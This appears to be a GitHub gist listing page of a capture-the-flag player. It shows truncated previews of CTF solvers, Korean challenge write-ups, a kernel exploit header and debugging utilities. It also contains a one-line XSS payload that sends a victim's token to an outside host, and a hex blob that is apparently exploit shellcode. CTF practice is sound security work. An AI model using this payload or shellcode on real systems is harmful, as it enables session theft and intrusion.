Skip to content

Instantly share code, notes, and snippets.

View _0tl_solver.py
#!/usr/bin/env python3
'''
[iv]
954e47bb4976a6aef3bcf67b8dbe30c6
[server random]
439419b5
client random (hex) >> 954e47bb4976a6aef3bcf67b8dbe30c6
Here is your key => 11 38 84 77 55 f8 a0 60 63 f4 bd d0 f8 45 4e 41
key = '11 38 84 77 55 f8 a0 60 63 f4 bd d0 f8 45 4e 41'
@junorouse
junorouse / marshal_thinking.md
Last active Mar 15, 2020
My approach to solve marshal (codegate 2020) prequal - 우주의 힘을 빌려 해킹하는 법
View marshal_thinking.md

setup

RUN sed -i -re 's/([a-z]{2}.)?archive.ubuntu.com|security.ubuntu.com/mirror.kakao.com/g' /etc/apt/sources.list

dockerfile이 주어지면 제일먼저 위 구문을 상단에 박아둔다. 한국에 있기 때문에 apt 서버를 카카오미러로 바꾸면 매우 빠르게 도커 파일을 빌드할 수 있음.

run 할 때 -v 옵션과(호스트 머신과 FS공유하기 위함) --cap-add=SYS_PTRACE를 통해 debuggable하게 설정해주면 된다.

@junorouse
junorouse / resize.js
Created Oct 24, 2019
Do You Even XSS Payload
View resize.js
location='http://app.imjuno.com:500/stage5/'+token;
View keybase.md

Keybase proof

I hereby claim:

  • I am junorouse on github.
  • I am junorouse (https://keybase.io/junorouse) on keybase.
  • I have a public key ASBg5FcE3A-ZdiX-4h-y0uK9RThK_ONdE7rUvbKtxL5PFQo

To claim this, I am signing this object:

View note.txt
8B4424208B481489481C60E8000000005BE825000000B9760100000F328D7B3B39F87411394500740689450089550889F831D20F306131C0C224008DAB00100000C1ED0CC1E50C83ED50C3B9230000006A300FA18ED98EC1648B0D400000008B6104519C60E8000000005BE8CBFFFFFF8B450083C0178944242431C09942F00FB055087512B976010000998B45000F30FBE804000000FA619DC38B4500C1E80CC1E00C2D001000006681384D5A75F4894504B8787CF4DBE8C300000097B83F5F647757E8B700000029F889C18D581C8D341F64A1240100008B3689F229C281FA0004000077F252B8E1140117E8950000008B400A8D50048D340FE8C50000003D5A6AFAC1740E3DD883E03E74078B3C1729D7EBE3897D0C8D1C1F8D75105F8B5B04B83E4CF8CEE85B0000008B400A29F8837C03F40074E731C0556A015550E800000000810424920000005053293C2456B8C45C196DE82500000031C050505056B83446CCAFE81500000085C074B08B451C80780E0174078900894004EBA0C3E802000000FFE0608B6D04978B453C8B54057801EA8B4A188B5A2001EB498B348B01EEE81D00000039F875F18B5A2401EB668B0C4B8B5A1C01EB8B048B01E88944241C61C35231C099ACC1CA0D01C285C075F6925AC358894424105859585A6052518B2831C064A22400000099B04050C1E0065054528911514A52B8EA996E57E8
@junorouse
junorouse / exploit.c
Created Apr 6, 2019
midnight-hfsipc
View exploit.c
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdint.h>
#define HFS_CREATE 0xABCD0001
#define HFS_DESTROY 0xABCD0002
#define HFS_READ 0xABCD0003
#define HFS_WRITE 0xABCD0004
@junorouse
junorouse / gist:ac0ec02f9e480cdf8b12c10abc457438
Created Jan 21, 2019 — forked from totherik/gist:3a4432f26eea1224ceeb
v8 --allow-natives-syntax RuntimeFunctions
View gist:ac0ec02f9e480cdf8b12c10abc457438
Per https://code.google.com/p/v8/codesearch#v8/trunk/src/runtime.cc
%CreateSymbol
%CreatePrivateSymbol
%CreateGlobalPrivateSymbol
%NewSymbolWrapper
%SymbolDescription
%SymbolRegistry
%SymbolIsPrivate
@junorouse
junorouse / symbols.py
Created Nov 17, 2018 — forked from luser/symbols.py
GDB Mozilla symbol server
View symbols.py
# Any copyright is dedicated to the Public Domain.
# http://creativecommons.org/publicdomain/zero/1.0/
#
# A GDB Python script to fetch debug symbols from the Mozilla symbol server.
#
# To use, run `source /path/to/symbols.py` in GDB 7.9 or newer, or
# put that in your ~/.gdbinit.
from __future__ import print_function
@junorouse
junorouse / _readme.md
Last active Nov 2, 2018
CODEGRAY WRITEUP
View _readme.md

헤드

베트남 화이트햇 하러 왔다가 메시지를 받고 짬짬이 푼 문제들 !

사실 대회보다 재밌었다 ㅜㅜ. 시간이 별로 없어 올클 하지 못한게 아쉽다 흑흑

obfuscator말고는 모든 문제를 열어보았다. 각 문제별 설명과 풀이는 아래에 있다.

한국가서 나머지 문제 풀어봐야겠다.

@junorouse
junorouse / kalzip
Created Oct 15, 2018 — forked from iamahuman/kalzip
Create and extract Zip archives with KS X 1001(euc-kr / MS949) encoded filenames
View kalzip
#!/usr/bin/env python
import zipfile
import os
import stat
import sys
import codecs
import time
import datetime
import unicodedata
import sys
You can’t perform that action at this time.